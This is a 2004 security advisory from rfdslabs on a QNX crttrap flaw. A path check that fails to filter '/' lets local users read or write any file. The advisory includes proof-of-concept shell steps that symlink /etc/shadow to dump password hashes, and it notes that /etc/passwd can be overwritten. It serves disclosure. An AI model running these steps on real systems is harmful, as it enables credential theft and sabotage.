*** rfdslabs security advisory *** Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004] Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A) Vendor: http://www.qnx.com Date: Dec 11 2004 Author: Julio Cesar Fort 1. Introduction crrtrap is a tool to detect video hardware and starts the correct driver for QNX. 2. Details crttrap has a '-c' flag to specify where trap file will be written. Combined with 'trap' flag it is possible to read/write any file in the disk. By default crttrap writes and read trap files in "/etc/system/config". Once this directory is owned by root we don't have permission to write. It filters "../" to prevent directory transversal vulnerabilities. In order to bypass this protection we noticed it doesn't check only for "/". This way is possible to make it create a sub directory, giving our group read and write priviledges. Now we are able to manipulate our trap file. $ crttrap -c tmp/rfdslabs trap /usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12 /usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12 crttrap: wrote config file as /etc/system/config/tmp/rfdslabs $ cd /etc/system/config/tmp $ ls -la total 52 drwxrwxr-x 2 root 100 2048 Dec 11 12:40 . drwxrwxr-x 3 root root 2048 Dec 11 12:35 .. -rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs $ rm -f rfdslabs $ ln -s /etc/shadow rfdslabs $ crttrap -c tmp/rfdslabs dump root:21QjUKxP9gEJK:0:0:0 sandimas:91UzHxvt3x1n2:0:0:0 We are also able to overwrite any file with 'trap' switch. As an example, an attacker can corrupt '/etc/passwd' and make login attempts fail everytime. See www.rfdslabs.com.br for another file deletion vulnerability in crttrap. PS: In 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in QNX 4.25. But his exploitation technique won't work with newest versions because crttrap opens "/etc/system/config" and its sub directories. 3. Solution No official solution yet. We suggest remove crttrap suid bit until QNX don't release a patch. 4. Timeline 10 Dec 2004: Vulnerability detected; 11 Dec 2004: Advisory written; rfdslabs contacts QNX; 20 Dec 2004: QNX replies back rfdslabs; 28 Dec 2004: Advisory released to public. Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury, Rodrigo Costa (NERV). www.rfdslabs.com.br - computers, sex, human mind, music and more Recife, PE, Brazil -- Julio Cesar Fort (julio at rfdslabs com br) Recife, PE, Brasil www.rfdslabs.com.br - computers, sex, human mind, music and more. ________________________________________________ Message sent using UebiMiau 2.7.2 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html